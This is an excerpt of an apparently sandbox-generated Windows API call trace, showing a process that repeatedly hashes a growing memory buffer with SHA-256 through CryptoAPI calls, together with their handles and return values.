	[0250.395] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.395] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.395] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.396] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.396] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0250.396] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c01c0
	[0250.396] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c01c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c01c0, pdwDataLen=0x128c3c) returned 1
	[0250.396] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.396] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.396] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.396] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.396] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0250.396] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0238
	[0250.397] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0238, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0238, pdwDataLen=0x128c3c) returned 1
	[0250.397] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.397] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.397] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.397] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.397] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0250.397] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.397] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c28a8
	[0250.397] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c28a8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c28a8, pdwDataLen=0x128c3c) returned 1
	[0250.397] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.397] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.397] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.397] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.397] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0250.397] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2808
	[0250.398] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2808, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2808, pdwDataLen=0x128c3c) returned 1
	[0250.398] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.398] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.398] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.398] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.398] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0250.398] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.398] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2830
	[0250.398] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2830, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2830, pdwDataLen=0x128c3c) returned 1
	[0250.398] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.398] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.398] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.398] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.398] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0250.399] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2948
	[0250.399] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2948, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2948, pdwDataLen=0x128c3c) returned 1
	[0250.399] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.399] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.399] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.399] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.399] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0250.399] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.399] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2970
	[0250.399] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2970, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2970, pdwDataLen=0x128c3c) returned 1
	[0250.399] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.399] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.399] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.399] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.400] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0250.400] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.400] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2998
	[0250.400] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2998, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2998, pdwDataLen=0x128c3c) returned 1
	[0250.400] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.400] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.400] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.400] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.400] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0250.400] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.400] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c29c0
	[0250.400] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c29c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c29c0, pdwDataLen=0x128c3c) returned 1
	[0250.400] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.400] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.400] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.401] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.401] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0250.401] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c29e8
	[0250.401] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c29e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c29e8, pdwDataLen=0x128c3c) returned 1
	[0250.401] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.401] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.401] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.401] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.401] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0250.401] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.401] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2a10
	[0250.401] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2a10, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2a10, pdwDataLen=0x128c3c) returned 1
	[0250.401] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.401] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.401] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.402] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.402] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0250.402] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2a38
	[0250.402] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2a38, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2a38, pdwDataLen=0x128c3c) returned 1
	[0250.402] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.402] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.402] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.402] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.402] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0250.402] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.402] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2a60
	[0250.402] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2a60, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2a60, pdwDataLen=0x128c3c) returned 1
	[0250.402] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.402] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.402] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.403] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.403] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0250.403] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2a88
	[0250.403] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2a88, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2a88, pdwDataLen=0x128c3c) returned 1
	[0250.403] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.403] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.403] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.403] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.403] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0250.403] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.403] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2ab0
	[0250.403] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2ab0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2ab0, pdwDataLen=0x128c3c) returned 1
	[0250.403] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.403] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.403] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.404] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.404] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0250.404] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2ad8
	[0250.404] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2ad8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2ad8, pdwDataLen=0x128c3c) returned 1
	[0250.404] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.404] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.404] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.404] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.404] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0250.404] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2b00
	[0250.404] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2b00, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2b00, pdwDataLen=0x128c3c) returned 1
	[0250.404] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.404] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.404] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.405] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.405] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0250.405] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2b28
	[0250.405] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2b28, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2b28, pdwDataLen=0x128c3c) returned 1
	[0250.405] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.405] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.405] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.405] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.405] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0250.405] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.405] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2b50
	[0250.405] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2b50, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2b50, pdwDataLen=0x128c3c) returned 1
	[0250.405] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.405] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.405] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.406] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.406] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0250.406] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.406] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2b78
	[0250.406] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2b78, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2b78, pdwDataLen=0x128c3c) returned 1
	[0250.406] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.406] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.406] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.406] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.406] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0250.406] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2ba0
	[0250.407] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2ba0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2ba0, pdwDataLen=0x128c3c) returned 1
	[0250.407] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.407] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.407] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.407] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.407] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0250.407] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2bc8
	[0250.407] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2bc8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2bc8, pdwDataLen=0x128c3c) returned 1
	[0250.407] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.407] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.407] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.408] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.408] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0250.408] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2bf0
	[0250.408] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2bf0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2bf0, pdwDataLen=0x128c3c) returned 1
	[0250.408] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.408] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.408] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.408] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.408] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0250.408] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2c18
	[0250.408] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c2c18, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2c18, pdwDataLen=0x128c3c) returned 1
	[0250.408] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.408] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.408] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.409] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.409] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0250.409] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2c40
	[0250.409] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c2c40, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c2c40, pdwDataLen=0x128c3c) returned 1
	[0250.409] CryptDestroyHash (hHash=0x22b70c0) returned 1
